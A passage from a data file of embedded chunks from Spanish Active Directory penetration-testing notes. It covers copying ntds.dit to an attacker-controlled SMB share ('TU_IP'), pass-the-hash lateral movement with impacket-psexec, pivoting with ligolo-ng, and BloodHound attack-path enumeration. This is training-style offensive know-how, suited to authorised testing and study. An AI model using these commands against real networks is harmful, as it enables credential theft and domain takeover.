0.04961, 0.15219, -0.15906, 0.14485, 0.08408, -0.10056, 0.03388, 0.01508, 0.13669, -0.05816, -0.02185, -0.08805, -0.02844, -0.0411, 0.07483, -0.13382, 0.1052, -0.03025, 0.01788, 0.02967, -0.06392, 0.11575, -0.03674, -0.01256, 0.04476, -0.03924, 0.09128, -0.07266, -0.07573, 0.10356, -0.12814, 0.01206, 0.00668, -0.086, 0.0655, -0.09512, -0.06681, -0.11036, 0.12023, 0.05692, -0.03324, 0.0198, -0.06064, -0.05577, -0.10485, -0.06847, 0.02571, -0.07417, 0.01091, -0.02846, 0.1346, 0.00578, 0.00896, 0.08616, 0.061, -0.1508, -0.02669, 0.02842, 0.06415, 0.05967, 0.01064, -0.01091, -0.10594, 0.14402, -0.03861, 0.03524, -0.02939, -0.03665, -0.02371, -0.01417, 0.0898, 0.01904, -0.03136, -0.04481, -0.05424, 0.00358, 0.02463, -0.02968, 0.03441, 0.038, -0.02173, -0.04932, -0.01963, -0.03615, -0.06999, -0.06598, -0.09178, 0.08922, -0.08826, -0.03273, 0.01643, 0.025, 0.03009, -0.02755, 0.00253, 0.0374, 0.01854, -0.00077, 0.00624, -0.06811, 0.1298, 0.03124, 0.01629, 0.07449, 0.09296, 0.09512, 0.05726, -0.01871, -0.05494, -0.00952, 0.12619, 0.0056, 0.02578, 0.04963, -0.00859, -0.00946, 0.00186, 0.04747, 0.00146, -0.04205, 0.02663, 0.02937, 0.01873, 0.04355, -0.01606, 0.00099, -0.06557, -0.02078, 0.10172, -0.00868, 0.00514, 0.01859, -0.001, -0.0138, -0.01275, -0.0479, 0.00065, -0.06272, 0.00722, -0.0604, 0.01556, -0.01885, 0.08153, -0.0361, -0.0117, -0.05304, 0.02168, 0.01959, -0.03326, -0.00442, -0.00084, -0.028, -0.05339, -0.0444, -0.00751, -0.07365, -0.00854, -0.01948, 0.02089, -0.01246, -0.04394, 0.00706, -0.02033, -0.05279, 0.06789, 0.06726, -0.04581, -0.00587, -0.00993, 0.02104, 0.08555, 0.01855, 0.04982, -0.04444, -0.02818, -0.0046, 0.04135, -0.02435, -0.01629, -0.03604, -0.02589, 0.02566, 0.10196, 0.02845, -0.01259, 0.01159, 0.02546, 0.01591, 0.03872, 0.04362, -0.05634, 0.05639, -0.00769, -0.04702, 0.06851, -0.02142, -0.00389, -0.08414, -0.0338, -0.0657, -0.01134, 0.04675, -0.04153, -0.0588, -0.07329, -0.05157, -0.04577, 0.05476, 0.05964, -0.04376, -0.01367, -0.03965, 0.01561, -0.04214, -0.03832, -0.04631]} +{"tipo": "metodologia", "herramienta": "apuntes-ad-pentest", "perfil": "PENTESTERS", "tema": "", "fichero": "conocimiento/apuntes-ad-pentest.md", "texto": "### D) Exfiltras un fichero grande (NTDS.dit, etc.)\n\nDesde la víctima:\n\n```cmd\ncopy C:\\Windows\\NTDS\\ntds.dit \\\\TU_IP\\loot\\\n```\n\nAparece en `/tmp/loot/` en tu Kali. **Esto sustituye al wget**, porque SMB cifra y atraviesa muchos firewalls.", "v": [-0.05658, -0.11479, -0.05186, 0.04941, 0.08726, -0.07872, -0.06796, 0.09225, -0.06362, 0.20582, -0.02568, -0.10751, 0.00943, -0.03996, -0.0963, -0.10967, -0.03349, -0.15605, 0.09265, -0.04923, -0.05954, -0.10723, -0.04937, -0.02175, 0.02636, 0.04911, 0.00065, 0.05471, -0.15697, 0.03439, 0.02915, -0.07359, -0.07959, 0.01972, 0.08013, -0.10176, 0.02003, -0.00525, 0.0179, 0.12345, 0.14836, 0.14077, -0.06452, 0.03375, 0.13675, -0.23777, -0.0275, -0.02571, 0.16598, -0.08591, -0.00683, -0.05534, -0.08877, -0.14243, 0.04341, -0.03376, 0.18613, -0.02311, 0.02492, 0.0661, -0.10609, 0.03122, -0.04322, -0.06505, 0.01435, -0.11181, 0.07279, -0.04116, -0.06252, 0.02298, -0.14843, 0.03094, -0.0154, -0.08474, 0.03972, -0.11559, -0.04104, -0.02657, 0.08568, 0.04867, -0.04143, -0.07322, -0.01899, -0.04338, -0.04434, -0.10719, 0.05502, -0.06983, -0.03285, -0.12103, 0.12723, 0.01737, -0.04755, 0.07781, 0.06179, -0.10444, 0.05351, 0.05094, 0.00468, -0.01354, 0.00692, 0.05013, -0.11015, 0.10287, -0.00804, 0.03629, 0.00883, 0.03955, -0.00277, -0.08874, 0.09221, 0.04698, 0.06616, -0.0225, -0.0113, -0.06756, -0.0275, 0.02095, 0.09256, -0.01626, 0.00703, -0.00611, -0.04296, 0.00604, 0.00451, -0.04213, -0.04682, 0.04623, -0.08321, -0.05128, 0.00351, -0.00991, -0.0029, -0.01875, -0.0174, -0.03986, -0.03118, -0.03795, -0.02361, -0.02581, 0.09789, 0.01887, 0.015, 0.0349, 0.0418, 0.05789, 0.04695, -0.03998, -0.02565, -0.02335, 0.13911, 0.00292, -0.0285, 0.05755, -0.0039, 0.01356, 0.03359, 0.0133, -0.04963, 0.02486, 0.04815, 0.01516, 0.06778, 0.06208, -0.01848, 0.01618, -0.00844, -0.0418, 0.04911, -0.07105, -0.00575, -0.006, -0.02839, -0.06596, -0.01336, -0.10788, 0.08138, -0.04421, -0.01611, -0.03797, 0.00391, 0.00482, 0.05312, 0.04373, 0.00454, -0.0591, 0.00676, 0.0218, -0.04964, 0.01371, 0.06425, 0.02908, -0.02204, -0.03379, -0.03135, -0.03402, -0.02146, -0.04423, 0.06855, 0.01742, -0.09668, 0.01637, -0.01719, -0.10884, 0.05615, 0.0094, -0.02656, 0.01557, -0.06101, 0.03214, 0.08845, -0.0018, 0.01686, -0.05848, -0.03534, 0.00832, 0.04091, 0.03953, 0.02997, 0.0008, -0.05015, 0.09497, 0.03205, -0.01641, -0.00277, 0.03138, 0.00634, 0.01128, 0.07627, 0.02758, -0.06047, 0.02625, 0.0125, -0.03588, 0.05891, 0.00544, -0.01995, -0.01746, -0.03175, -0.03596, 0.0109, 0.02418, -0.02499, -0.06312, -0.01504, -0.04013, -0.01199, 0.0154, 0.05421, -0.0559, 0.00442, -0.04137, 0.02737, -0.02906, -0.01071, 0.00648]} +{"tipo": "metodologia", "herramienta": "apuntes-ad-pentest", "perfil": "PENTESTERS", "tema": "", "fichero": "conocimiento/apuntes-ad-pentest.md", "texto": "### E) Lateral movement con Impacket (sin reverse shell nueva)\n\nUna vez tienes hash de un user privilegiado:\n\n```bash\nimpacket-psexec -hashes :NTLMHASH 'admin@10.10.10.20'\n```\n\nTe da shell SYSTEM en otra máquina, **sin necesidad de meter ninguna reverse shell**. Por encima de la red, autenticado, limpio.", "v": [0.0183, -0.18033, -0.07749, -0.01799, 0.00793, -0.10282, -0.2524, -0.03296, -0.02891, 0.15974, -0.17376, 0.10666, 0.03421, -0.02024, 0.07529, 0.04113, -0.1335, -0.02257, -0.00018, 0.00752, -0.01651, 0.06123, -0.16005, -0.00569, 0.05684, 0.04765, -0.04377, 0.12417, -0.21955, -0.05063, -0.05866, -0.07237, -0.06707, -0.05846, 0.01035, 0.08165, -0.01292, 0.00437, 0.0557, 0.18261, 0.02883, 0.1416, -0.0387, 0.14644, 0.10872, -0.03448, 0.02274, 0.01777, 0.05946, -0.10064, -0.04082, -0.02816, -0.23046, -0.00445, 0.10541, -0.01843, 0.13076, 0.04102, -0.03857, -0.01679, 0.01772, 0.09461, 0.00725, 0.00707, 0.05063, -0.03894, -0.00232, -0.14722, 0.00624, 0.05129, -0.08047, 0.00813, 0.07239, -0.02541, 0.01223, 0.00764, 0.07395, -0.04447, 0.00041, 0.11436, -0.06793, -0.07038, -0.03241, -0.07577, -0.05679, -0.03644, 0.03929, -0.0479, 0.03354, 0.01127, 0.05985, -0.02385, -0.01273, 0.01838, 0.0347, -0.06039, -0.07814, 0.02988, -0.09526, 0.04275, 0.01129, -0.01999, 0.00205, 0.09941, 0.04937, 0.01237, -0.00883, 0.01132, 0.07831, 0.0752, 0.07082, -0.08104, 0.08023, 0.03953, -0.02929, -0.04754, -0.07409, -0.00598, -0.05044, -0.02339, 0.03836, 0.00869, 0.05503, -0.05441, 0.04806, -0.08401, -0.05, 0.11712, -0.00267, -0.01439, 0.04824, 0.00617, 0.00157, 0.05965, -0.00916, 0.05341, -0.01727, 0.03651, -0.03737, -0.07864, 0.07856, 0.07108, -0.06644, -0.0278, 0.04328, 0.05654, 0.09783, -0.12649, -0.10937, 0.04168, 0.04708, 0.00336, 0.02311, 0.01459, -0.03532, -0.00038, -0.00864, -0.05853, -0.08802, -0.02733, -0.01149, 0.02723, -0.01569, 0.03472, -0.01397, 0.04621, 0.00347, -0.01117, 0.0063, -0.05462, -0.03736, 0.00193, -0.02619, 0.04538, -0.00187, 0.01228, 0.05987, -0.03384, -0.00351, -0.06227, 0.06694, -0.05551, 0.02524, -0.06269, 0.061, -0.00447, -0.02301, 0.06496, 0.02658, 0.00566, 0.06508, 0.01691, 0.01657, 0.01407, 0.01967, 0.03488, 0.03881, -0.04614, 0.06722, 0.06866, 0.00282, 0.03714, 0.02925, -0.07236, 0.00849, -0.01144, -0.03275, 0.01659, -0.0015, 0.02988, 0.0258, 0.02547, -0.00481, 0.02432, -0.05437, -0.07496, 0.02692, -0.00318, 0.02265, 0.00689, -0.00175, -0.01929, 0.02867, 0.06622, -0.00595, -0.03658, 0.0388, 0.0317, 0.06816, -0.00982, -0.04365, 0.02279, -0.04058, -0.05225, -0.0405, 0.01926, 0.0245, -0.03684, -0.05295, -0.05943, -0.04813, 0.09235, 0.00181, -0.05881, -0.00671, -0.02014, -0.00505, 0.02512, 0.01085, -0.03039, -0.03215, -0.03334, -0.04686, -0.11674, 0.03337, 0.09357]} +{"tipo": "metodologia", "herramienta": "apuntes-ad-pentest", "perfil": "PENTESTERS", "tema": "", "fichero": "conocimiento/apuntes-ad-pentest.md", "texto": "### F) Pivoting (entrar en una red interna) con ligolo-ng\n\n```\n TU KALI USUARIO1 RED INTERNA\n 10.10.10.5 10.10.10.50 192.168.5.0/24\n │ │ │\n │ ligolo proxy │ │\n │ ───── tunel ─────► │ │\n │ │ │\n │ ligolo agent ─── puede llegar ──► 192.168.5.10 (DC)\n │ │\n │ añades ruta: │\n │ ip route add │\n │ 192.168.5.0/24 dev ligolo\n │\n │ ahora desde Kali:\n │ impacket-psexec admin@192.168.5.10 ◄── el tráfico va por el túnel\n ▼\n```\n\n---", "v": [-0.11964, -0.13914, -0.0582, 0.07424, 0.0026, -0.1363, -0.07748, 0.07862, -0.0153, 0.06255, -0.02031, -0.11578, -0.0027, -0.07901, -0.08502, -0.12596, -0.1205, -0.01856, 0.04673, -0.04398, -0.03036, 0.08661, -0.04054, -0.00938, 0.09293, 0.10607, 0.00287, -0.03863, -0.04406, -0.10058, 0.0031, -0.00372, -0.13943, -0.03451, 0.02105, 0.04414, 0.0013, 0.12756, -0.01501, 0.14789, -0.00577, 0.038, -0.08393, 0.04382, -0.00843, -0.03313, 0.1099, -0.01286, -0.00122, -0.12534, -0.01277, -0.05461, 0.01907, -0.10052, 0.00364, 0.05384, 0.10127, -0.03909, -0.05758, -0.08139, 0.22178, 0.03952, -0.03807, -0.06095, 0.01207, -0.03618, 0.08579, -0.00546, -0.03725, -0.0355, -0.08204, 0.02656, -0.02782, 0.05902, 0.06304, 0.01786, 0.12225, -0.05814, 0.01679, 0.03396, -0.01864, 0.00835, -0.07556, -0.12592, -0.03925, -0.10218, 0.06882, -0.09159, 0.01496, -0.02411, -0.10311, -0.08355, -0.00512, 0.07615, 0.01295, -0.05616, -0.0161, 0.03979, -0.00678, -0.04197, 0.05418, 0.03634, -0.07445, 0.02875, 0.10634, 0.01898, -0.02099, -0.02479, 0.06404, 0.09987, 0.0504, 0.03384, 0.04771, -0.08543, 0.02213, 0.05621, -0.11085, 0.10438, 0.01167, -0.03176, -0.03409, 0.03896, -0.00538, -0.0233, 0.03709, -0.11452, -0.06153, 0.05576, 0.05201, -0.00596, 0.0057, 0.00456, -0.12987, -0.03325, -0.03029, 0.03224, 0.01257, 0.01616, 0.03338, -0.00889, 0.07913, -0.11786, 0.02299, -0.01297, 0.05649, 0.16545, -0.00642, -0.04974, -0.10486, 0.07461, 0.03323, 0.05418, -0.04366, -0.01921, 0.00727, 0.08108, 0.00864, -0.07407, -0.05159, 0.05023, 0.08342, 0.10234, 0.06929, -0.00073, 0.00553, 0.06427, 0.04206, -0.04738, 0.08585, -0.08858, 0.013, 0.03926, -0.0409, -0.01189, -0.11493, 0.01193, 0.07803, -0.08092, -0.03868, -0.00276, 0.07277, -0.11597, -0.00074, 0.05301, 0.0431, -0.02885, -0.01131, -0.09849, 0.06686, -0.00012, -0.10693, -0.02787, 0.06499, 0.03526, 0.01669, 0.05569, 0.02964, 0.00891, 0.05591, 0.02437, 0.00759, 0.01204, 0.02126, -0.08038, -0.00045, -0.02786, 0.04974, 0.01957, 0.05173, 0.08862, 0.091, -0.0689, -0.01979, -0.01736, -0.05775, -0.0522, 0.03655, -0.08627, 0.02529, -0.0522, 0.0413, 0.04849, 0.03563, 0.03287, 0.01756, 0.01173, -0.034, 0.05944, -0.00177, -0.01747, -0.06858, 0.04811, -0.07199, -0.09036, -0.01619, 0.03828, 0.04593, 0.05001, -0.04696, -0.04453, -0.0235, 0.069, -0.01641, -0.05595, -0.03811, -0.00731, 0.01364, 0.03507, -0.00419, -0.04802, -0.03631, -0.00385, 0.03303, -0.12674, 0.0559, 0.04276]} +{"tipo": "metodologia", "herramienta": "apuntes-ad-pentest", "perfil": "PENTESTERS", "tema": "", "fichero": "conocimiento/apuntes-ad-pentest.md", "texto": "### Qué hace\n\nTe dibuja Active Directory **como un grafo**. Nodos = usuarios, grupos, máquinas. Aristas = relaciones (member of, admin de, puede leer LAPS, etc.). Luego le preguntas:\n\n> \"¿Cuál es el camino más corto desde **juan** hasta **Domain Admins**?\"\n\nY te lo pinta. Te ahorra **días** de mirar listados de grupos a mano.", "v": [-0.14273, 0.03935, 0.00212, -0.06388, -0.04715, -0.06363, -0.02792, 0.01394, -0.13772, 0.04074, 0.05167, -0.13091, 0.00153, -0.04764, 0.13778, -0.09449, 0.16256, 0.04978, 0.04794, 0.01484, -0.06599, 0.03714, -0.13065, -0.00626, -0.09601, -0.07171, 0.11581, -0.12251, -0.08544, 0.194, 0.06912, -0.01269, 0.0586, -0.09249, -0.01349, -0.10461, 0.06407, 0.13874, 0.04404, 0.19347, -0.08799, 0.03756, -0.09492, -0.02774, -0.032, -0.00833, -0.07213, -0.05259, -0.05909, -0.01977, -0.07324, 0.01886, -0.07726, 0.04079, -0.03819, -0.06625, 0.16614, -0.0096, 0.02812, -0.08029, 0.03179, 0.00151, -0.08822, -0.0605, 0.04005, -0.00355, 0.10905, -0.03821, -0.04484, 0.06155, -0.03237, 0.0002, -0.03703, -0.00316, 0.11315, -0.03592, 0.07477, 0.00501, -0.03375, 0.04043, 0.08333, -0.0338, -0.06912, -0.04229, -0.04095, -0.09332, 0.00374, -0.08728, -0.11427, -0.06482, 0.20038, 0.09472, -0.02965, 0.00472, 0.00843, 0.03966, -0.03724, 0.06029, 0.09062, 0.03276, 0.04492, 0.09166, -0.02742, 0.09586, 0.06823, 0.10114, 0.04708, 0.0159, 0.0028, 0.04095, 0.0809, -0.00942, -0.06001, -0.09163, -0.04155, -0.00166, -0.02057, 0.01181, 0.00201, -0.06487, -0.04334, 0.01543, -0.02813, 0.04069, 0.00892, -0.0554, 0.03184, 0.12711, -0.04843, 0.04866, -0.01006, 0.05497, -0.04691, -0.11879, -0.10232, 0.0544, 0.01507, 0.06324, 0.0059, -0.09145, 0.07525, 0.04835, -0.02507, -0.11626, 0.08114, 0.04273, 0.03703, -0.14293, -0.01982, 0.01794, -0.02028, 0.01388, 0.01745, 0.03222, 0.0828, 0.00723, -0.01718, -0.13446, -0.04801, -0.02857, -0.02288, 0.02902, 0.11044, 0.02243, -0.02243, 0.05339, -0.05616, -0.01376, 0.01026, 0.03633, 0.02913, 0.00358, -0.02351, -0.01315, 0.0396, -0.03459, 0.00091, -0.0439, 0.00703, -0.02788, 0.04718, 0.03242, 0.0093, 0.04787, -0.04768, -0.04354, 0.01022, -0.02155, 0.098, 0.00609, 0.01163, 0.01314, -0.02443, -0.02091, -0.00382, -0.03324, 0.00938, -0.04611, -0.02066, -0.049, -0.00058, -0.01508, -0.0124, -0.00971, -0.02069, 0.05618, -0.02071, 0.045, 0.04953, 0.0318, 0.00879, -0.00726, 0.05974, -0.03473, -0.05149, -0.07785, -0.0306, 0.00558, -0.0341, 0.03381, -0.01938, 0.08898, 0.08441, -0.00857, 0.09238, -0.02135, 0.0644, -0.04013, 0.0404, 0.05329, -0.0496, 0.04759, 0.02357, -0.10903, 0.01269, 0.01077, 0.0613, -0.03755, -0.02964, -0.03161, 0.06298, 0.08429, -0.01413, -0.01212, -0.1049, -0.03407, -0.03, 0.00959, -0.06522, -0.06468, 0.00266, -0.02006, -0.01095, -0.05711, 0.02192, 0.00916]} +{"tipo": "metodologia", "herramienta": "apuntes-ad-pentest", "perfil": "PENTESTERS", "tema": "", "fichero": "conocimiento/apuntes-ad-pentest.md", "texto": "```\n ┌─────────┐ MemberOf ┌──────────────┐\n │ juan ├─────────────►│ HelpDesk │\n └─────────┘ └──────┬───────┘\n │ AdminTo\n ▼\n ┌──────────────┐\n │ workstation42│\n └──────┬───────┘\n │ HasSession (admin con sesión activa aquí)\n ▼\n ┌──────────────┐\n │ ana │\n └──────┬───────┘\n │ MemberOf\n ▼\n ┌──────────────┐\n │ Domain Admins│ ← jackpot\n └──────────────┘\n```", "v": [-0.36608, 0.11714, 0.22691, 0.09381, 0.10363, -0.14709, -0.065, -0.07288, 0.0409, -0.03783, -0.14174, -0.01416, 0.00444, -0.0473, -0.10695, -0.05697, 0.03637, -0.0633, -0.10166, 0.07271, 0.01452, 0.00842, -0.05924, -0.02448, -0.01676, -0.03905, -0.06505, 0.02937, -0.04731, -0.01035, -0.0445, 0.00478, -0.21223, 0.06088, -0.02911, 0.03408, -0.05661, -0.01475, -0.02446, 0.21007, -0.0566, -0.02144, -0.09379, 0.08579, -0.11867, 0.06009, 0.03425, 0.00244, -0.08982, -0.1449, -0.08075, -0.07191, 0.08391, 0.01422, 0.00293, -0.01431, 0.10356, -0.1024, -0.07943, -0.09954, 0.09698, 0.06833, 0.01063, -0.01751, -0.0437, -0.04286, 0.07432, -0.06317, -0.00785, -0.05182, -0.07288, -0.05758, -0.01426, -0.08224, 0.03983, -0.07802, 0.12782, -0.09223, 0.00291, 0.03931, 0.01893, -0.08162, -0.09878, 0.01041, 0.03278, -0.13406, 0.09199, -0.08719, -0.03943, 0.00626, -0.02402, 0.01682, 0.00297, 0.01977, -0.03748, -0.05831, 0.08337, -0.01655, 0.0399, -0.03779, 0.09217, 0.01068, -0.015, -0.05147, 0.0902, -0.0375, -0.01748, 0.04123, 0.03793, 0.02119, 0.07272, -0.0444, 0.06784, -0.09129, -0.03313, 0.1029, -0.04109, 0.066, 0.09414, 0.01122, -0.00556, -0.04862, -0.00728, 0.03259, 0.05002, -0.03787, 0.01777, 0.08168, -0.01629, 0.02063, 0.04183, 0.04152, -0.0424, -0.01908, 0.0106, 0.07929, 0.10576, 0.02064, 0.03658, 0.07598, -0.05697, -0.10489, 0.06505, -0.0347, 0.09208, 0.0781, 0.04711, -0.0393, -0.02537, 0.0056, -0.0062, 0.11452, 0.00047, -0.01503, -0.00714, 0.01274, 0.02937, -0.06556, 0.00679, 0.02947, -0.00131, 0.09407, 0.03621, 0.03184, -0.03189, 0.00096, 0.02122, 0.03186, 0.02492, -0.04009, -0.0242, -0.0133, -0.01718, 0.05801, -0.0299, 0.00655, 0.02324, 0.01433, 0.09183, 0.02426, -0.00807, 0.01882, 0.03089, 0.00925, -0.06911, 0.00597, -0.0581, -0.04844, 0.0635, 0.01233, -0.01063, 0.01704, -0.03248, 0.03432, -0.00321, 0.0068, 0.02124, 0.05644, 0.07116, 0.01173, 0.0462, 0.06416, -0.01533, -0.05242, 0.05046, -0.05154, 0.02195, 0.0184, -0.00536, 0.01413, 0.03459, -0.024, 0.03901, -0.06612, -0.03892, -0.00184, 0.02698, 0.00754, -0.0122, -0.01846, -0.00024, -0.00823, 0.07297, -0.01186, 0.03738, 0.06208, 0.01116, -0.00908, 0.01775, -0.03408, -0.02111, -0.00162, -0.00502, -0.05929, 0.00949, 0.03606, -0.0356, -0.01823, -0.01983, -0.03495, 0.00245, 0.01503, -0.00598, -0.05962, -0.05911, -0.04472, -0.06432, 0.02582, -0.02512, -0.0097, 0.01117, 0.02903, 0.01859, -0.0063, 0.0085, -0.04179]} +{"tipo": "metodologia", "herramienta": "apuntes-ad-pentest", "perfil": "PENTESTERS", "tema": "", "fichero": "conocimiento/apuntes-ad-pentest.md", "texto": "### Componentes\n\n```\n ┌──────────────────┐ ┌─────────────────┐ ┌──────────────┐\n │ SharpHound (.exe)│ o │ bloodhound-python│ ────► │ JSON files │\n │ corre en víctima │ │ corre en Kali │ │ con datos AD│\n └──────────────────┘ └─────────────────┘ └──────┬───────┘\n │\n ▼\n ┌──────────────────┐\n │ BloodHound GUI │\n │ (en tu Kali) │\n │ + │\n │ Neo4j (base BD) │\n └──────────────────┘\n```", "v": [-0.3909, 0.04399, 0.19964, 0.09596, 0.08284, -0.15832, -0.04594, -0.05057, 0.04931, -0.05499, -0.11262, -0.03201, -0.01176, -0.02432, -0.11957, -0.07166, -0.03906, -0.08973, -0.10572, 0.07626, -0.0069, 0.00981, -0.05447, -0.03338, -0.02596, 0.03192, -0.06269, 0.06332, -0.06768, 0.007, -0.0887, 0.03132, -0.18643, 0.07882, -0.08438, -0.00041, -0.10657, -0.01928, -0.08438, 0.19187, -0.05056, -0.02013, -0.08633, 0.05852, -0.08687, 0.01735, 0.01403, 0.06238, -0.04193, -0.12345, -0.05581, -0.02968, 0.0278, -0.02566, 0.01128, -0.02513, 0.12776, -0.08375, -0.0445, -0.11641, 0.09606, 0.02037, 0.05239, -0.02449, -0.01235, -0.05793, 0.08776, -0.0915, -0.04533, -0.04488, -0.07658, -0.05353, -0.02667, -0.10083, 0.02342, -0.1095, 0.09473, -0.08935, 0.00899, 0.04777, 0.00099, -0.10874, -0.12968, 0.0174, 0.03497, -0.13276, 0.11673, -0.08326, -0.03309, 0.02666, 0.01024, 0.00321, -0.00195, 0.06486, -0.01342, -0.06235, 0.06575, -0.02751, 0.06635, -0.02794, 0.10391, 0.00138, -0.0316, -0.0295, 0.0962, -0.03449, -0.02121, 0.04536, 0.02132, 0.02202, 0.02927, -0.03319, 0.05153, -0.08928, -0.02949, 0.04887, -0.02105, 0.07372, 0.07584, 0.01259, 0.00788, -0.06474, -0.00384, 0.04432, 0.00797, -0.04353, -0.00484, 0.08137, -0.02504, 0.0319, 0.04254, 0.05512, -0.05063, -0.04897, 0.02614, 0.10476, 0.10189, 0.01898, 0.07038, 0.06015, -0.02969, -0.10735, 0.0733, 0.02186, 0.04419, 0.07738, 0.04073, -0.0443, -0.04556, 0.03446, 0.03254, 0.10596, -0.00147, -0.00038, -0.01773, -0.00762, 0.0364, -0.05655, -0.01061, 0.02282, 0.00517, 0.09716, 0.01269, 0.04033, -0.02741, 0.0473, 0.01072, 0.02782, 0.03479, -0.03192, -0.00473, -0.00525, 0.00884, 0.05873, -0.0245, -0.02808, 0.04182, -0.0177, 0.07506, 0.02684, 0.00551, 0.00676, 0.00939, 0.02297, -0.04197, -0.0023, -0.06672, -0.04107, 0.06547, -0.017, -0.00456, 0.05062, -0.00584, 0.02483, 0.0032, 0.00403, 0.02704, 0.05182, 0.07397, 0.03028, 1e-05, 0.07611, -0.00441, -0.04331, 0.04915, -0.02144, -0.00038, 0.02828, -0.02574, 0.02557, 0.0283, -0.02184, 0.04295, -0.06341, -0.04736, -0.02533, 0.0404, 0.00597, -0.00598, -0.01276, -0.00988, -0.00839, 0.06673, -0.01359, 0.00577, 0.05607, 0.02356, -0.02702, 0.02472, -0.06314, 6e-05, 0.01079, -0.02019, -0.06378, 0.01679, 0.0525, -0.04356, -0.01285, -0.02625, -0.03776, 0.0271, 0.02934, -0.03284, -0.09689, -0.04694, -0.03619, -0.06935, 0.0347, 0.00576, -0.01609, -0.00682, 0.0339, 0.03549, -0.00638, 0.00603, -0.06237]} +{"tipo": "metodologia", "herramienta": "apuntes-ad-pentest", "perfil": "PENTESTERS", "tema": "", "fichero": "conocimiento/apuntes-ad-pentest.md", "texto": "- **SharpHound** = el \"recolector\" que enumera AD. Hay versión `.exe` (subes a víctima) y `.py` (corres desde Kali si ya tienes creds y conectividad).\n- **BloodHound GUI** = la interfaz gráfica donde cargas el JSON y haces queries.\n- **Neo4j** = la base de datos del grafo (la GUI la necesita).", "v": [-0.19147, -0.09172, -0.07972, -0.05504, 0.13893, -0.1651, -0.04093, 0.04416, 0.0525, -0.0005, -0.02621, -0.0959, -0.13866, -0.00226, 0.11275, -0.01875, -0.03771, -0.0544, -0.05601, 0.10028, -0.07353, 0.11564, -0.09762, -0.10654, -0.12288, 0.11756, 0.03559, 0.03005, -0.15298, 0.04689, 0.01677, -0.08807, -0.02492, -0.05087, -0.14464, -0.05229, -0.05713, 0.02722, 0.04352, 0.13372, 0.05939, 0.0417, -0.14797, -0.00351, 0.09928, -0.08518, 0.01735, 0.04167, 0.04258, 0.00533, 0.00809, 0.01336, -0.21598, -0.06873, -0.01886, -0.09832, 0.15832, -0.08743, 0.01949, -0.04638, 0.0446, 0.0362, 0.07853, -0.07162, 0.0684, -0.04805, 0.06797, -0.09254, -0.03742, 0.09019, -0.02705, 0.04958, -0.05449, -0.07027, 0.02999, -0.11435, -0.02514, -0.07174, 0.11315, 0.09706, 0.02094, -0.03012, -0.10261, 0.01758, -0.06734, -0.0038, 0.03206, -0.04054, -0.02957, 0.03991, 0.16276, -0.02853, -0.04453, 0.04321, 0.05399, -0.05744, -0.00158, 0.00609, 0.14772, 0.00279, 0.06141, 0.03083, -0.10834, 0.10409, 0.07389, 0.03586, 0.00162, 0.02215, -0.06463, -0.02622, 0.09961, 0.01201, 0.0191, 0.02586, 0.00047, -0.0411, 0.03439, 0.05277, -0.01612, -0.06759, 0.02098, -0.03758, -0.00107, 0.04713, -0.12145, -0.04149, -0.08979, 0.10141, 0.03036, -0.01187, -0.0606, -0.03637, 0.01108, -0.11279, -0.06872, 0.08951, 0.00979, -0.06047, 0.06622, -0.03169, 0.01172, 0.04499, 0.01054, -0.00173, 0.00245, 0.02974, 0.04945, -0.03997, -0.07391, 0.05286, 0.0894, 0.0266, 0.0414, 0.03132, 0.00348, -0.04211, 0.03671, -0.00365, -0.02144, 0.00158, -0.00177, 0.02613, 0.02643, 0.03195, -0.02874, 0.0199, -0.09513, 0.03113, -0.00412, 0.03105, -0.02224, 0.00443, -0.07324, -0.00782, 0.01613, -0.08901, 0.0036, -0.08657, -0.08804, -0.01346, 0.04438, -0.02344, 0.02684, -0.01052, -0.03011, -0.04255, 0.03086, 0.00282, 0.01511, -0.03907, 0.03814, 0.09485, 0.01103, 0.01778, 0.03555, -0.00419, 0.05126, 0.01383, -0.03296, 0.02087, -0.04807, 0.01252, -0.03895, -0.01817, 0.05891, 0.09479, -0.05699, 0.04226, -0.02547, 0.0124, 0.02641, 0.0036, 0.0233, -0.04965, -0.02856, -0.08482, 0.05455, -0.00632, 0.01381, 0.01922, -0.05558, 0.0457, -0.00306, 0.01451, -0.04684, 0.02212, 0.04611, -0.01837, 0.06276, -0.01589, -0.01029, 0.05889, -0.01198, -0.0531, -0.00491, 0.038, -0.01134, -0.01701, -0.0685, -0.05282, 0.06885, 0.05162, -0.08013, -0.09196, -0.0307, -0.05675, -0.02701, 0.02099, 0.04397, -0.04709, -0.04307, 0.02223, 0.06325, -0.06263, 0.0274, -0.04842]} +{"tipo": "metodologia", "herramienta": "apuntes-ad-pentest", "perfil": "PENTESTERS", "tema": "", "fichero": "conocimiento/apuntes-ad-pentest.md", "texto": "### Instalación en Debian\n\n```bash\nsudo apt install -y bloodhound bloodhound.py\n```\n\n```bash", "v": [-0.10939, -0.06754, -0.06523, -0.06861, 0.04152, -0.08901, -0.08199, -0.19001, -0.0704, 0.11416, -0.04381, -0.02274, -0.11737, 0.01714, -0.15743, -0.12273, -0.24127, -0.0116, 0.00828, -0.04569, 0.04047, 0.07921, -0.10306, 0.12847, -0.06382, 0.10109, 0.01307, 0.12682, -0.11443, -0.01737, 0.00056, -0.09189, -0.01259, 0.0181, -0.1265, -0.06625, -0.10914, 0.02866, 0.00018, 0.26705, -0.1513, -0.06767, 0.04753, 0.08689, 0.01072, -0.07728, 0.01673, -0.00645, 0.10452, -0.07555, 0.0232, -0.00512, -0.161, -0.04358, 0.01228, -0.05669, 0.12145, -0.12101, 0.02259, -0.00494, -0.0957, -0.01599, 0.00398, 0.12, 0.0423, 0.03721, -0.02949, -0.12106, -0.06624, 0.11804, -0.10822, 0.08362, -0.06525, 0.03713, 0.0375, 0.00543, -0.06552, -0.04477, 0.06445, 0.01667, -0.09652, -0.05697, 0.0669, 0.01857, -0.08558, -0.13115, 0.06218, 0.01941, 0.067, 0.08793, 0.00292, -0.0458, 0.03334, 0.01123, 0.08451, -0.03949, 0.03967, 0.02602, 0.06735, -0.03705, -0.05988, 0.06894, -0.03136, 0.11873, 0.09304, -0.10239, -0.02053, 0.00588, 0.02803, -0.05628, 0.11596, 0.00582, -0.00483, -0.02325, -0.07126, -0.04316, 0.05701, 0.07657, -0.01524, 0.01261, -0.08092, -0.04024, -0.00054, 0.05835, -0.08664, -0.08422, -0.03608, 0.04911, -0.04415, 0.01092, -0.0004, 0.01388, 0.01874, 0.01584, -0.10745, 0.08652, 0.00729, -0.06934, -0.00456, -0.08003, -0.0046, 0.0516, 0.02636, 0.02587, 0.02353, 0.05289, -0.02148, -0.07505, -0.00309, 0.00166, 0.04482, 